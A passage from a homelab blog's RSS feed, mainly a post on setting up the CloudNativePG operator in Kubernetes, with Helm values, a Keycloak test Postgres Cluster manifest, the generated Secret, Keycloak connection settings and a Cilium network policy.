<p>Then let me finish with my favorite plot:
<figure>
    <img loading="lazy" src="csi_volumes.png"
         alt="A Grafana plot showing four gauges. They are titled &#39;prometheus-monitoring-kube-prometheus-&#39; and then the label is cut off. The rest are titled &#39;scratch-volume&#39;, twice, and finally &#39;scratch-redis-0&#39;. The three scratch volumes show very &lt; 1% usage, while the prometheus gauge shows 56%."/> <figcaption>
            <p>CSI storage volume utilization.</p>
        </figcaption>
</figure>

This plot shows the space utilization of all currently mounted CSI volumes. Which
is absolutely great, because for Nomad, I had to create my own scripting, which
basically ran <code>df -h</code> on the nodes and filtered for Nomad&rsquo;s CSI volume mount
dir to find the right values. Those were then written to a file in Prometheus
format, to be picked up by the local node-exporter&rsquo;s <code>textfile</code> collector. But
here, I&rsquo;m getting those directly from Kubernetes, which is pretty nice.
But there&rsquo;s one disadvantage with this plot: If a volume has been remounted
during the metric interval, it will show up twice, as one of the labels on the
<code>kubelet_volume_stats</code> is the node where the volume was mounted.</p>
<p>And that&rsquo;s it! &#x1f389;
I&rsquo;ve finally got metrics for my k8s cluster. Next step will be migrating my
Grafana instance to k8s as well.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 8: Setting up CloudNativePG for Postgres DB Support</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/</link>
      <pubDate>Thu, 29 Feb 2024 00:13:05 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/</guid>
      <description>Setting up CloudNativePG with a full Keycloak example</description>
      <content:encoded><![CDATA[<p>Wherein I set up cloud-native-pg to supply Postgres clusters in my k8s cluster.</p>
<p>This is part nine of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p><a href="https://www.postgresql.org/">PostgreSQL</a> is currently the only DBMS in my
Homelab. My initial plan was to just copy and paste the deployment over from
my Nomad setup. But then I was pointed towards <a href="https://cloudnative-pg.io/">CloudNativePG</a>,
which is an operator for managing Postgres deployments in Kubernetes.</p>
<p>But before I go into details on CloudNativePG, a short overview of my current setup in
Nomad. I&rsquo;ve got only a single Postgres instance, hosting several databases for
a variety of apps. By far the largest DB at the moment is for my Mastodon
instance, with something over 1 GB in size. It runs on a CSI volume provided
by my Ceph cluster, located on a couple of SSDs. All apps use this one Postgres
instance, and there&rsquo;s no High Availability or failover.</p>
<p>For backups, I&rsquo;m doing a full <code>pg_dumpall</code> of all the databases, which I pipe
into Restic and back up to an S3 bucket. For new apps, I&rsquo;m following a simple
playbook of manually creating the database and the DB user from the command line
with <code>psql</code>.</p>
<p>This approach is okayish, but CloudNativePG has one big advantage: It allows
declarative creation of Postgres instances. So I won&rsquo;t have to follow a playbook
anymore.</p>
<h1 id="overview-of-cloudnativepg">Overview of CloudNativePG</h1>
<figure>
    <img loading="lazy" src="cnpg-archi.png"
         alt="An architecture diagram for CloudNativePG. The central part is the cnpg-operator. Three pieces, each titled &#39;kind: Cluster&#39; and with &#39;dbname: foo/bar/baz&#39; point into the operator. The operator itself then points to three pairs of databases. Each of them called &#39;foo/bar/baz&#39; and having a partner called &#39;foo-replica/bar-replica/baz-replica&#39;. Into each of those pairs point three apps, called &#39;foo-app/bar-app/baz-app&#39;."/> <figcaption>
            <p>Architecture of CloudNativePG.</p>
        </figcaption>
</figure>

<p>The CloudNativePG architecture is centered around the operator. This operator
is responsible for creating the database clusters themselves. And these are
full Postgres clusters. CloudNativePG only has minimal direct support for multiple
databases in a single cluster.</p>
<p>When the operator sees a new <a href="https://cloudnative-pg.io/documentation/current/cloudnative-pg.v1/#postgresql-cnpg-io-v1-Cluster">Cluster</a>
resource, it creates the given number of Postgres Pods. This can range from a
single pod, without any High Availability, to a cluster with a single primary
and a number of replicas. The replication is entirely built upon Postgres&rsquo; own
replication features. CloudNativePG only provides the correct configuration,
but doesn&rsquo;t put anything on top of it.</p>
<p>Each new cluster is created with a single database and two users, the
<code>postgres</code> superuser and an application user which only has permissions for the
application database.</p>
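<p>To make this a bit more concrete before getting to the full example later on,
a minimal Cluster can look roughly like this (names and sizes are just placeholders):</p>
<pre tabindex="0"><code>apiVersion: postgresql.cnpg.io/v1
kind: Cluster
metadata:
  name: example-pg
spec:
  # A single instance means no HA, just one primary
  instances: 1
  bootstrap:
    initdb:
      # The single application database and its owning user
      database: example
      owner: example
  storage:
    size: 2Gi
</code></pre><p>The operator then spins up the Pod, creates the <code>example</code> database and the two
users described above.</p>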
<p>When a new cluster is created, the operator also provides a Kubernetes Secret,
with the username and password of the application DB user, the name of the
Service for that particular cluster as well as a full JDBC string. Applications
wanting to use the cluster only need to consume the appropriate keys from the
Secret.</p>
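<p>Consuming that Secret is then just the usual <code>secretKeyRef</code> business. A small
sketch, using the placeholder Cluster name from above and the key names as I understand
them from the documentation:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Pod
metadata:
  name: psql-client
spec:
  containers:
    - name: psql
      image: postgres:16
      command: ["sleep", "3600"]
      env:
        # CloudNativePG puts the credentials into a Secret named after the Cluster,
        # with an -app suffix
        - name: PGHOST
          valueFrom:
            secretKeyRef:
              name: example-pg-app
              key: host
        - name: PGUSER
          valueFrom:
            secretKeyRef:
              name: example-pg-app
              key: username
        - name: PGPASSWORD
          valueFrom:
            secretKeyRef:
              name: example-pg-app
              key: password
</code></pre><p>With that in place, a <code>kubectl exec</code> into the Pod and a plain <code>psql</code> connects
to the application database without any manually managed credentials.</p>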
<p>In addition to providing the database cluster itself, CloudNativePG also provides
a pretty nice backup system as well as easy use of backups created from that
data to create fresh clusters when recovery from an incident is necessary.</p>
<p>Those backups can be based on writing to an S3 bucket, or creating volume snapshots
from within Kubernetes. In this post, I will concentrate on the S3 method, as
that&rsquo;s what I decided on. No specific reason, besides the fact that I&rsquo;ve got
my other backups in S3 as well, and I already have infrastructure to back those
buckets up on separate media.</p>
<p>With the S3 method, the Write Ahead Logs are continuously streamed to S3. At the
same time, regular backups of the full <code>PGDATA</code> directory are created and
also pushed to the bucket.</p>
<p>But all of this also comes with some downsides, at least from my PoV. The first and
foremost one is that CloudNativePG only fully supports one database per Postgres
cluster. This is contrary to my current setup with one cluster and many databases.
On a certain level, the setup with one database cluster per database/app doesn&rsquo;t
make much sense to me. Postgres is made to support a number of different databases
per cluster, not just one. But this &ldquo;one DB per cluster&rdquo; approach has grown out of the
microservice architecture paradigm, and it does have its advantages, for example when
different apps require different Postgres versions.</p>
<p>But it also comes with some overhead. With a single cluster, I can just throw
some HW at it and check occasionally whether I need to add some more. Be this
CPU, memory or storage. But with multiple clusters, I need to make that decision
for each app. And I need to do it up front, where I don&rsquo;t have any data to base
those decisions on. And there&rsquo;s a pretty wide gap just in the apps I&rsquo;m already
running. Both Nextcloud and Mastodon put quite some demands on the databases, with
the Mastodon DB at over 1 GB in size even for my single-user instance. At the
same time, those two apps also put consistent load on the DBs, even when I don&rsquo;t
directly use them. On the other side are things like Keycloak, whose DB comes
in at 12 MB and which is only accessed when I actually log in somewhere.
Making all of these decisions, and making them up front, isn&rsquo;t that nice compared
to just having a single DB instance where I just throw some HW at it occasionally.
Now, I have to do that for eight different instances.</p>
<p>Next are the backups. Streaming the WAL to S3 will mean at least some more strain
on my S3 infrastructure. And those WALs are not optional. When using an S3 bucket
for backups, the WALs are mandatory. But it doesn&rsquo;t feel like they bring me
any benefit. I mean sure, when I actually have an issue and need to restore,
it&rsquo;s going to be nice to be able to do Point in Time restores, instead of having
to fall back to a last backup that is potentially up to 24 hours old.
There&rsquo;s also an issue with retention. It&rsquo;s one-dimensional. I can provide one
time window, say 30 days, for which I can restore, but there&rsquo;s no concept of
saying &ldquo;I want a backup for the last 14 days, each one of the last 6 months, and
one year ago&rdquo;.</p>
<p>But with all of this whining, I&rsquo;m still a sucker for declarative definitions of
my database, so let&rsquo;s quit the complaining and get to some YAML files. &#x1f913;</p>
<h1 id="detour-looking-at-k8s-priority-classes">Detour: Looking at K8s priority classes</h1>
<p>Ah, but before we get to the YAML, I would like to take a rather short detour
to Kubernetes&rsquo; <a href="https://kubernetes.io/docs/concepts/scheduling-eviction/pod-priority-preemption/#priorityclass">PriorityClass</a>.
These priority classes are basically complex wrappers around a number between
<code>-2147483648</code> and <code>1000000000</code>. They are priorities used for scheduling by
Kubernetes. If there&rsquo;s no space left on the cluster, and a pending Pod has a
higher priority than an already running one, the lower priority Pod will be evicted
and the higher priority one will be scheduled in its place.</p>
<p>Kubernetes comes with two of those classes by default, <code>system-cluster-critical</code> and
<code>system-node-critical</code>. As an example, most of my Ceph Rook pods have one or
the other of those. My MON Pods, for example, have the node critical class, as
it is not just important that they run somewhere, but it is important that they
run on certain nodes. The same is true, for example, for my Fluentbit log shippers;
they should also be running on all nodes before absolutely anything else.
For cluster level critical, my example would again be Ceph Rook Pods, namely
the CSI providers. They don&rsquo;t have to run on specific nodes, but they definitely
have to be running somewhere.</p>
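<p>For reference, attaching one of these classes to a workload is just a single
field in the Pod spec. A minimal sketch, with a made-up Pod standing in for
something like a log shipper:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Pod
metadata:
  name: log-shipper
spec:
  # The scheduler treats this Pod as node critical and may preempt
  # lower priority Pods to make room for it.
  priorityClassName: system-node-critical
  containers:
    - name: shipper
      image: fluent/fluent-bit:latest
</code></pre>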
<p>But in my Homelab, there are some additional things which should have priority.
The first thing is just critical apps. This would be things like my databases,
because so many other services will depend on them, which is why I bring priorities
up here.
The second special class of services is going to be externally visible services.
So for example, it is way more important to me that my Mastodon instance stays
up than that my Gitea instance stays up.</p>
<p>As an example, the <code>hl-critical</code> PriorityClass would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">scheduling.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PriorityClass</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hl-critical</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">value</span>: <span style="color:#ae81ff">500000000</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">globalDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Priority class for critical Homelab pods&#34;</span>
</span></span></code></pre></div><p>And now finally to the main event. &#x1f642;</p>
<h1 id="operator-setup">Operator setup</h1>
<p>The first part to set up for CloudNativePG is the operator. I&rsquo;m using
<a href="https://github.com/cloudnative-pg/charts/tree/main/charts/cloudnative-pg">the Helm chart</a>
for this. There aren&rsquo;t really that many config options for the Operator
itself, so here it is:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">INHERITED_LABELS</span>: <span style="color:#ae81ff">homelab/*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">cloud-native-pg</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;hl-critical&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podMonitorEnabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">grafanaDashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">create</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">monitoringQueriesConfigMap</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">queries</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>Two interesting things here. The first one is the <code>config.data.INHERITED_LABELS</code>
setting. This defines labels which should be taken from the Cluster manifest
and applied to all resources, like Pods, Secrets and so on, created for that
same cluster. It&rsquo;s a neat way to have even auto-generated resources properly labeled.</p>
<p>The second noteworthy config is <code>monitoringQueriesConfigMap.queries</code>. In the
default values of the chart, there are a lot of queries pre-defined. But as
I don&rsquo;t have any monitoring yet, I disabled them for now.</p>
<p>And that&rsquo;s it already. Deploying this Helm chart will create a single Pod with
the operator, ready to receive Cluster resources for the actual Postgres deployments.</p>
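<p>For completeness, deploying the chart looks roughly like this. The repo URL,
namespace and release name are my assumptions rather than anything prescribed:</p>
<pre tabindex="0"><code>helm repo add cnpg https://cloudnative-pg.github.io/charts
helm upgrade --install cnpg cnpg/cloudnative-pg \
  --namespace cnpg-operator --create-namespace \
  -f values.yaml
</code></pre>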
<h1 id="setting-up-a-cloudnativepg-cluster-for-keycloak">Setting up a CloudNativePG cluster for Keycloak</h1>
<p>Before I get to the cluster setups, I would like to rant for a paragraph. I
don&rsquo;t actually have any app on the cluster which needs Postgres yet. But I still
wanted to test CloudNativePG before moving on to that first app. I wanted something
really simple, perhaps even something which produces some test data on a button
press, with a small web frontend to read the data again, to verify that DB
restores worked properly. So I googled, with something like &ldquo;kubernetes postgres
simple app&rdquo; or &ldquo;simple postgres test app&rdquo;. And I got zero results. None. All I
got were boatloads of articles on how to set up Postgres on Kubernetes, or how
to write a simple app using Postgres with language/framework X. And I&rsquo;m pretty
sure that something like what I want exists. Probably in dozens of varieties,
even.
But Google would not surface those apps. I tried a lot of permutations of the
above queries. Nothing.</p>
<p>But I got lucky, and <a href="https://transitory.social/@rachel">Rachel</a> pointed me
towards <a href="https://www.keycloak.org/">Keycloak</a>. It has the advantage that it
only needs Postgres as a dependency, so it was relatively easy to set up.
Plus, I&rsquo;m already running a Keycloak instance on Nomad, so I&rsquo;m familiar with
it already. And creation of new users is sufficiently close to &ldquo;create database
records on the press of a button&rdquo; for my needs. Thanks Rachel. &#x1f642;</p>
<h2 id="basic-cluster-and-keycloak-setup">Basic cluster and Keycloak setup</h2>
<p>Yes, this is where we finally get to see a Postgres Pod enter the story. &#x1f605;</p>
<p>So as I&rsquo;ve mentioned multiple times before, the Operator is fed with Cluster
type resources and then spawns the appropriate number of Postgres Pods, configures
replication and generates a secret for use by the app.</p>
<p>My Keycloak test cluster looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">keycloak-test</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;32MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;96MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;8MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;983kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;81kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;1GB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2Gi</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span></code></pre></div><p>Because I set the <code>INHERITED_LABELS</code> config in the operator to <code>homelab/*</code>,
all resources created for this cluster will get the label <code>homelab/part-of: keycloak-test</code>.
The <code>metadata.name</code> is significant here, as it will become part of the Pod names
as well as the path for backups, once we get to them. The <code>instances</code> config
determines the replication. There needs to be at least one instance, the primary.
All additional instances are replicas. CloudNativePG also supports more involved
configs, but I&rsquo;m keeping it simple here, with a single primary and a single
replica.</p>
<p>The <code>bootstrap</code> section defines how the database is initially created. The
<code>initdb</code> method I&rsquo;m using here creates an empty database. You can also create
the cluster from another cluster, either from a running cluster, where the new
cluster will use the streaming replication protocol, or from a backup, when the
previous cluster doesn&rsquo;t exist anymore. I intend to give the streaming replication
approach a try when I start migrating services using Postgres from my Nomad cluster.
Perhaps I can skip manual <code>pg_dump</code> backups and restores this way.
I will show restoration of a cluster from another cluster&rsquo;s backups in a later
section.</p>
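<p>For that migration case, my understanding is that bootstrapping from a running
cluster uses the <code>pg_basebackup</code> bootstrap method, pointing at the old instance
via <code>externalClusters</code>. A rough, untested sketch with made-up connection details:</p>
<pre tabindex="0"><code>spec:
  bootstrap:
    pg_basebackup:
      source: nomad-postgres
  externalClusters:
    - name: nomad-postgres
      connectionParameters:
        host: postgres.example.com
        user: streaming_replica
        dbname: postgres
      password:
        name: nomad-postgres-credentials
        key: password
</code></pre>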
<p>The <code>postgresql.parameters</code> were initialized via <a href="https://pgtune.leopard.in.ua/">pgtune</a>.
I never tuned my databases before, and I&rsquo;m curious what impact this will have
on DBs with higher load, like my Mastodon DB.</p>
<p>Last but not least, I&rsquo;m telling CloudNativePG to use my SSD-backed <code>rbd-fast</code>
StorageClass and provide a 2Gi volume.</p>
<p>Once I deploy this manifest, the Operator gets to work. It will first create
a Postgres Pod for the primary. These Pods use special CloudNativePG images,
not the default Postgres ones. Once that&rsquo;s set up, it will create a second pod,
as a replica.</p>
<p>In the Postgres instances, multiple users will be created. First, the <code>postgres</code>
superuser. This user will not be made available anywhere and is only for internal
use. But another user, in this case called <code>keycloak</code> as configured in
<code>spec.bootstrap.initdb.owner</code>, will be created. This user is intended for use
by the app. Its credentials will be put into a Secret called <code>$CLUSTERNAME-app</code>,
in this particular example <code>keycloak-pg-cluster-app</code>. This secret has the
following content:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">host</span>: <span style="color:#ae81ff">keycloak-pg-cluster-rw</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jdbc-uri</span>: <span style="color:#ae81ff">jdbc:postgresql://keycloak-pg-cluster-rw:5432/keycloak?password=6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ&amp;user=keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#ae81ff">6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgpass</span>: <span style="color:#ae81ff">keycloak-pg-cluster-rw:5432:keycloak:keycloak:6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ\n</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">uri</span>: <span style="color:#ae81ff">postgresql://keycloak:6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ@keycloak-pg-cluster-rw:5432/keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">username</span>: <span style="color:#ae81ff">keycloak</span>
</span></span></code></pre></div><p>This secret contains all the information a client needs to connect to the DB
cluster. The given <code>host: keycloak-pg-cluster-rw</code> is a service CloudNativePG
creates, and which points to the primary of the cluster. In addition to this
service, CloudNativePG also creates <code>keycloak-pg-cluster-r</code> and <code>keycloak-pg-cluster-ro</code>
services, which point to both the primary and the replicas, or to the replicas only,
respectively. This can be used when there are some read-only apps using the
database.</p>
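<p>As a quick way to poke at those services, one could run a throwaway <code>psql</code>
pod against the read-only service. The image tag and flags here are my own
guess, not something CloudNativePG ships, and <code>psql</code> will prompt for the
password from the Secret:</p>
<pre tabindex="0"><code>kubectl run psql-client --rm -it --image=postgres:16 -- \
  psql &#34;host=keycloak-pg-cluster-ro dbname=keycloak user=keycloak&#34;
</code></pre>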
<p>Let me show you a quick example of how to connect to the Cluster, with <a href="https://www.keycloak.org/">Keycloak</a>
as an example.</p>
<p><strong>DO NOT USE THIS IN PROD!</strong></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">keycloak-test</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/keycloak/keycloak:23.0.7</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">args</span>: [<span style="color:#e6db74">&#34;start-dev&#34;</span>]
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_URL_HOST</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_URL_PORT</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_URL_DATABASE</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_USERNAME</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_PASSWORD</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span></code></pre></div><p>This shows how to use <code>valueFrom.secretKeyRef</code> to get the database connection
details from the Secret which was created by CloudNativePG.</p>
<p>There&rsquo;s also one important configuration needed when you&rsquo;re using NetworkPolicy
to secure the Namespace where the cluster is created. This NetworkPolicy needs
to allow the CloudNativePG operator to access the cluster pods. In a CiliumNetworkPolicy,
it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;keycloak-pg-cluster-allow-operator-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cnpg.io/cluster</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
